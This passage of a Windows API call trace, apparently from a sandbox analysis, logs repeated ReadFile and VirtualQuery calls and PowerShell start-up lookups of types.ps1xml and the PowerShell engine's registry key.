[0084.252] ReadFile (in: hFile=0x334, lpBuffer=0x2c66268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed308, lpOverlapped=0x0 | out: lpBuffer=0x2c66268*, lpNumberOfBytesRead=0xed308*=0x1000, lpOverlapped=0x0) returned 1 [0084.252] ReadFile (in: hFile=0x334, lpBuffer=0x2c66268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed308, lpOverlapped=0x0 | out: lpBuffer=0x2c66268*, lpNumberOfBytesRead=0xed308*=0x1000, lpOverlapped=0x0) returned 1 [0084.252] ReadFile (in: hFile=0x334, lpBuffer=0x2c66268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed308, lpOverlapped=0x0 | out: lpBuffer=0x2c66268*, lpNumberOfBytesRead=0xed308*=0x1000, lpOverlapped=0x0) returned 1 [0084.253] ReadFile (in: hFile=0x334, lpBuffer=0x2c66268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed308, lpOverlapped=0x0 | out: lpBuffer=0x2c66268*, lpNumberOfBytesRead=0xed308*=0x1000, lpOverlapped=0x0) returned 1 [0084.253] ReadFile (in: hFile=0x334, lpBuffer=0x2c66268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed308, lpOverlapped=0x0 | out: lpBuffer=0x2c66268*, lpNumberOfBytesRead=0xed308*=0x1000, lpOverlapped=0x0) returned 1 [0084.253] ReadFile (in: hFile=0x334, lpBuffer=0x2c66268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed308, lpOverlapped=0x0 | out: lpBuffer=0x2c66268*, lpNumberOfBytesRead=0xed308*=0x1000, lpOverlapped=0x0) returned 1 [0084.254] ReadFile (in: hFile=0x334, lpBuffer=0x2c66268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed308, lpOverlapped=0x0 | out: lpBuffer=0x2c66268*, lpNumberOfBytesRead=0xed308*=0x1000, lpOverlapped=0x0) returned 1 [0084.254] ReadFile (in: hFile=0x334, lpBuffer=0x2c66268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed308, lpOverlapped=0x0 | out: lpBuffer=0x2c66268*, lpNumberOfBytesRead=0xed308*=0x1000, lpOverlapped=0x0) returned 1 [0084.254] ReadFile (in: hFile=0x334, lpBuffer=0x2c66268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed308, lpOverlapped=0x0 | out: lpBuffer=0x2c66268*, lpNumberOfBytesRead=0xed308*=0x1000, lpOverlapped=0x0) returned 1 [0084.254] ReadFile (in: hFile=0x334, lpBuffer=0x2c66268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed308, lpOverlapped=0x0 | out: lpBuffer=0x2c66268*, lpNumberOfBytesRead=0xed308*=0x1000, lpOverlapped=0x0) returned 1 [0084.254] ReadFile (in: hFile=0x334, lpBuffer=0x2c66268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed308, lpOverlapped=0x0 | out: lpBuffer=0x2c66268*, lpNumberOfBytesRead=0xed308*=0x1000, lpOverlapped=0x0) returned 1 [0084.254] ReadFile (in: hFile=0x334, lpBuffer=0x2c66268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed308, lpOverlapped=0x0 | out: lpBuffer=0x2c66268*, lpNumberOfBytesRead=0xed308*=0x1000, lpOverlapped=0x0) returned 1 [0084.255] ReadFile (in: hFile=0x334, lpBuffer=0x2c66268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed308, lpOverlapped=0x0 | out: lpBuffer=0x2c66268*, lpNumberOfBytesRead=0xed308*=0x1000, lpOverlapped=0x0) returned 1 [0084.256] ReadFile (in: hFile=0x334, lpBuffer=0x2c66268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed308, lpOverlapped=0x0 | out: lpBuffer=0x2c66268*, lpNumberOfBytesRead=0xed308*=0x1000, lpOverlapped=0x0) returned 1 [0084.256] ReadFile (in: hFile=0x334, lpBuffer=0x2c66268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed308, lpOverlapped=0x0 | out: lpBuffer=0x2c66268*, lpNumberOfBytesRead=0xed308*=0x1000, lpOverlapped=0x0) returned 1 [0084.256] ReadFile (in: hFile=0x334, lpBuffer=0x2c66268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed308, lpOverlapped=0x0 | out: lpBuffer=0x2c66268*, lpNumberOfBytesRead=0xed308*=0x1000, lpOverlapped=0x0) returned 1 [0084.256] ReadFile (in: hFile=0x334, lpBuffer=0x2c66268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed308, lpOverlapped=0x0 | out: lpBuffer=0x2c66268*, lpNumberOfBytesRead=0xed308*=0x1000, lpOverlapped=0x0) returned 1 [0084.256] ReadFile (in: hFile=0x334, lpBuffer=0x2c66268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed308, lpOverlapped=0x0 | out: lpBuffer=0x2c66268*, lpNumberOfBytesRead=0xed308*=0x1000, lpOverlapped=0x0) returned 1 [0084.256] ReadFile (in: hFile=0x334, lpBuffer=0x2c66268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed308, lpOverlapped=0x0 | out: lpBuffer=0x2c66268*, lpNumberOfBytesRead=0xed308*=0x1000, lpOverlapped=0x0) returned 1 [0084.257] ReadFile (in: hFile=0x334, lpBuffer=0x2c66268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed308, lpOverlapped=0x0 | out: lpBuffer=0x2c66268*, lpNumberOfBytesRead=0xed308*=0x1000, lpOverlapped=0x0) returned 1 [0084.257] ReadFile (in: hFile=0x334, lpBuffer=0x2c66268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed308, lpOverlapped=0x0 | out: lpBuffer=0x2c66268*, lpNumberOfBytesRead=0xed308*=0x1000, lpOverlapped=0x0) returned 1 [0084.257] ReadFile (in: hFile=0x334, lpBuffer=0x2c66268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed308, lpOverlapped=0x0 | out: lpBuffer=0x2c66268*, lpNumberOfBytesRead=0xed308*=0x1000, lpOverlapped=0x0) returned 1 [0084.257] ReadFile (in: hFile=0x334, lpBuffer=0x2c66268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed308, lpOverlapped=0x0 | out: lpBuffer=0x2c66268*, lpNumberOfBytesRead=0xed308*=0x1000, lpOverlapped=0x0) returned 1 [0084.257] ReadFile (in: hFile=0x334, lpBuffer=0x2c66268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed308, lpOverlapped=0x0 | out: lpBuffer=0x2c66268*, lpNumberOfBytesRead=0xed308*=0x1000, lpOverlapped=0x0) returned 1 [0084.257] ReadFile (in: hFile=0x334, lpBuffer=0x2c66268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed308, lpOverlapped=0x0 | out: lpBuffer=0x2c66268*, lpNumberOfBytesRead=0xed308*=0x1000, lpOverlapped=0x0) returned 1 [0084.258] ReadFile (in: hFile=0x334, lpBuffer=0x2c66268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed308, lpOverlapped=0x0 | out: lpBuffer=0x2c66268*, lpNumberOfBytesRead=0xed308*=0x1000, lpOverlapped=0x0) returned 1 [0084.258] ReadFile (in: hFile=0x334, lpBuffer=0x2c66268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed308, lpOverlapped=0x0 | out: lpBuffer=0x2c66268*, lpNumberOfBytesRead=0xed308*=0x1000, lpOverlapped=0x0) returned 1 [0084.258] ReadFile (in: hFile=0x334, lpBuffer=0x2c66268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed308, lpOverlapped=0x0 | out: lpBuffer=0x2c66268*, lpNumberOfBytesRead=0xed308*=0x1000, lpOverlapped=0x0) returned 1 [0084.258] ReadFile (in: hFile=0x334, lpBuffer=0x2c66268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed308, lpOverlapped=0x0 | out: lpBuffer=0x2c66268*, lpNumberOfBytesRead=0xed308*=0x1000, lpOverlapped=0x0) returned 1 [0084.260] ReadFile (in: hFile=0x334, lpBuffer=0x2c66268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed308, lpOverlapped=0x0 | out: lpBuffer=0x2c66268*, lpNumberOfBytesRead=0xed308*=0x1000, lpOverlapped=0x0) returned 1 [0084.260] ReadFile (in: hFile=0x334, lpBuffer=0x2c66268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed308, lpOverlapped=0x0 | out: lpBuffer=0x2c66268*, lpNumberOfBytesRead=0xed308*=0x1000, lpOverlapped=0x0) returned 1 [0084.260] ReadFile (in: hFile=0x334, lpBuffer=0x2c66268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed308, lpOverlapped=0x0 | out: lpBuffer=0x2c66268*, lpNumberOfBytesRead=0xed308*=0x1000, lpOverlapped=0x0) returned 1 [0084.260] ReadFile (in: hFile=0x334, lpBuffer=0x2c66268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed308, lpOverlapped=0x0 | out: lpBuffer=0x2c66268*, lpNumberOfBytesRead=0xed308*=0x1000, lpOverlapped=0x0) returned 1 [0084.261] ReadFile (in: hFile=0x334, lpBuffer=0x2c66268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed308, lpOverlapped=0x0 | out: lpBuffer=0x2c66268*, lpNumberOfBytesRead=0xed308*=0x1000, lpOverlapped=0x0) returned 1 [0084.261] ReadFile (in: hFile=0x334, lpBuffer=0x2c66268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed308, lpOverlapped=0x0 | out: lpBuffer=0x2c66268*, lpNumberOfBytesRead=0xed308*=0x1000, lpOverlapped=0x0) returned 1 [0084.261] ReadFile (in: hFile=0x334, lpBuffer=0x2c66268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed308, lpOverlapped=0x0 | out: lpBuffer=0x2c66268*, lpNumberOfBytesRead=0xed308*=0x1000, lpOverlapped=0x0) returned 1 [0084.261] ReadFile (in: hFile=0x334, lpBuffer=0x2c66268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed308, lpOverlapped=0x0 | out: lpBuffer=0x2c66268*, lpNumberOfBytesRead=0xed308*=0x1000, lpOverlapped=0x0) returned 1 [0084.261] ReadFile (in: hFile=0x334, lpBuffer=0x2c66268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed308, lpOverlapped=0x0 | out: lpBuffer=0x2c66268*, lpNumberOfBytesRead=0xed308*=0x1b4, lpOverlapped=0x0) returned 1 [0084.261] ReadFile (in: hFile=0x334, lpBuffer=0x2c66268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed308, lpOverlapped=0x0 | out: lpBuffer=0x2c66268*, lpNumberOfBytesRead=0xed308*=0x0, lpOverlapped=0x0) returned 1 [0084.261] CloseHandle (hObject=0x334) returned 1 [0084.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xed020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0084.262] SetErrorMode (uMode=0x1) returned 0x1 [0084.262] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed280 | out: lpFileInformation=0xed280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0084.262] SetErrorMode (uMode=0x1) returned 0x1 [0084.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xecfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0084.262] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed368 | out: phkResult=0xed368*=0x334) returned 0x0 [0084.262] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed2ec, lpData=0x0, lpcbData=0xed2e8*=0x0 | out: lpType=0xed2ec*=0x1, lpData=0x0, lpcbData=0xed2e8*=0x56) returned 0x0 [0084.262] CoTaskMemAlloc (cb=0x5a) returned 0x1b282d50 [0084.262] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed2bc, lpData=0x1b282d50, lpcbData=0xed2b8*=0x56 | out: lpType=0xed2bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed2b8*=0x56) returned 0x0 [0084.262] CoTaskMemFree (pv=0x1b282d50) [0084.262] RegCloseKey (hKey=0x334) returned 0x0 [0084.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xecfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0084.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xece60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0084.557] VirtualQuery (in: lpAddress=0xec050, lpBuffer=0xecf10, dwLength=0x30 | out: lpBuffer=0xecf10*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.658] VirtualQuery (in: lpAddress=0xec050, lpBuffer=0xecf10, dwLength=0x30 | out: lpBuffer=0xecf10*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.660] VirtualQuery (in: lpAddress=0xec050, lpBuffer=0xecf10, dwLength=0x30 | out: lpBuffer=0xecf10*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.661] VirtualQuery (in: lpAddress=0xec050, lpBuffer=0xecf10, dwLength=0x30 | out: lpBuffer=0xecf10*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.661] VirtualQuery (in: lpAddress=0xec050, lpBuffer=0xecf10, dwLength=0x30 | out: lpBuffer=0xecf10*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.661] VirtualQuery (in: lpAddress=0xec050, lpBuffer=0xecf10, dwLength=0x30 | out: lpBuffer=0xecf10*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.662] VirtualQuery (in: lpAddress=0xec050, lpBuffer=0xecf10, dwLength=0x30 | out: lpBuffer=0xecf10*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.667] VirtualQuery (in: lpAddress=0xec050, lpBuffer=0xecf10, dwLength=0x30 | out: lpBuffer=0xecf10*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.678] VirtualQuery (in: lpAddress=0xec050, lpBuffer=0xecf10, dwLength=0x30 | out: lpBuffer=0xecf10*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.679] VirtualQuery (in: lpAddress=0xec050, lpBuffer=0xecf10, dwLength=0x30 | out: lpBuffer=0xecf10*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.679] VirtualQuery (in: lpAddress=0xec050, lpBuffer=0xecf10, dwLength=0x30 | out: lpBuffer=0xecf10*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.680] VirtualQuery (in: lpAddress=0xec050, lpBuffer=0xecf10, dwLength=0x30 | out: lpBuffer=0xecf10*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.681] VirtualQuery (in: lpAddress=0xec050, lpBuffer=0xecf10, dwLength=0x30 | out: lpBuffer=0xecf10*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.681] VirtualQuery (in: lpAddress=0xec050, lpBuffer=0xecf10, dwLength=0x30 | out: lpBuffer=0xecf10*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.683] VirtualQuery (in: lpAddress=0xec050, lpBuffer=0xecf10, dwLength=0x30 | out: lpBuffer=0xecf10*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.683] VirtualQuery (in: lpAddress=0xec050, lpBuffer=0xecf10, dwLength=0x30 | out: lpBuffer=0xecf10*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.689] VirtualQuery (in: lpAddress=0xec050, lpBuffer=0xecf10, dwLength=0x30 | out: lpBuffer=0xecf10*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.693] VirtualQuery (in: lpAddress=0xec050, lpBuffer=0xecf10, dwLength=0x30 | out: lpBuffer=0xecf10*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.693] VirtualQuery (in: lpAddress=0xec050, lpBuffer=0xecf10, dwLength=0x30 | out: lpBuffer=0xecf10*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.694] VirtualQuery (in: lpAddress=0xec050, lpBuffer=0xecf10, dwLength=0x30 | out: lpBuffer=0xecf10*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.694] VirtualQuery (in: lpAddress=0xec050, lpBuffer=0xecf10, dwLength=0x30 | out: lpBuffer=0xecf10*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.694] VirtualQuery (in: lpAddress=0xec050, lpBuffer=0xecf10, dwLength=0x30 | out: lpBuffer=0xecf10*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.694] VirtualQuery (in: lpAddress=0xec050, lpBuffer=0xecf10, dwLength=0x30 | out: lpBuffer=0xecf10*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.694] VirtualQuery (in: lpAddress=0xec050, lpBuffer=0xecf10, dwLength=0x30 | out: lpBuffer=0xecf10*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.694] VirtualQuery (in: lpAddress=0xec050, lpBuffer=0xecf10, dwLength=0x30 | out: lpBuffer=0xecf10*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.695] VirtualQuery (in: lpAddress=0xec050, lpBuffer=0xecf10, dwLength=0x30 | out: lpBuffer=0xecf10*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.695] VirtualQuery (in: lpAddress=0xec050, lpBuffer=0xecf10, dwLength=0x30 | out: lpBuffer=0xecf10*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.695] VirtualQuery (in: lpAddress=0xec050, lpBuffer=0xecf10, dwLength=0x30 | out: lpBuffer=0xecf10*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.695] VirtualQuery (in: lpAddress=0xec050, lpBuffer=0xecf10, dwLength=0x30 | out: lpBuffer=0xecf10*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.695] VirtualQuery (in: lpAddress=0xec050, lpBuffer=0xecf10, dwLength=0x30 | out: lpBuffer=0xecf10*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.696] VirtualQuery (in: lpAddress=0xec050, lpBuffer=0xecf10, dwLength=0x30 | out: lpBuffer=0xecf10*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.697] VirtualQuery (in: lpAddress=0xec060, lpBuffer=0xecf20, dwLength=0x30 | out: lpBuffer=0xecf20*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.697] VirtualQuery (in: lpAddress=0xec060, lpBuffer=0xecf20, dwLength=0x30 | out: lpBuffer=0xecf20*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.697] VirtualQuery (in: lpAddress=0xec050, lpBuffer=0xecf10, dwLength=0x30 | out: lpBuffer=0xecf10*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.698] VirtualQuery (in: lpAddress=0xec050, lpBuffer=0xecf10, dwLength=0x30 | out: lpBuffer=0xecf10*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.849] VirtualQuery (in: lpAddress=0xec050, lpBuffer=0xecf10, dwLength=0x30 | out: lpBuffer=0xecf10*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.850] VirtualQuery (in: lpAddress=0xec050, lpBuffer=0xecf10, dwLength=0x30 | out: lpBuffer=0xecf10*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.850] VirtualQuery (in: lpAddress=0xec050, lpBuffer=0xecf10, dwLength=0x30 | out: lpBuffer=0xecf10*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.905] CoTaskMemAlloc (cb=0x104) returned 0x1f7740 [0084.905] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7740, nSize=0x80 | out: lpBuffer="") returned 0x0 [0084.905] CoTaskMemFree (pv=0x1f7740) [0084.914] VirtualQuery (in: lpAddress=0xec050, lpBuffer=0xecf10, dwLength=0x30 | out: lpBuffer=0xecf10*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.929] VirtualQuery (in: lpAddress=0xec050, lpBuffer=0xecf10, dwLength=0x30 | out: lpBuffer=0xecf10*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.930] VirtualQuery (in: lpAddress=0xec050, lpBuffer=0xecf10, dwLength=0x30 | out: lpBuffer=0xecf10*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.930] VirtualQuery (in: lpAddress=0xec050, lpBuffer=0xecf10, dwLength=0x30 | out: lpBuffer=0xecf10*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.930] VirtualQuery (in: lpAddress=0xec050, lpBuffer=0xecf10, dwLength=0x30 | out: lpBuffer=0xecf10*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.930] VirtualQuery (in: lpAddress=0xec050, lpBuffer=0xecf10, dwLength=0x30 | out: lpBuffer=0xecf10*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.930] VirtualQuery (in: lpAddress=0xec050, lpBuffer=0xecf10, dwLength=0x30 | out: lpBuffer=0xecf10*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.931] VirtualQuery (in: lpAddress=0xec050, lpBuffer=0xecf10, dwLength=0x30 | out: lpBuffer=0xecf10*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.935] VirtualQuery (in: lpAddress=0xec050, lpBuffer=0xecf10, dwLength=0x30 | out: lpBuffer=0xecf10*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, 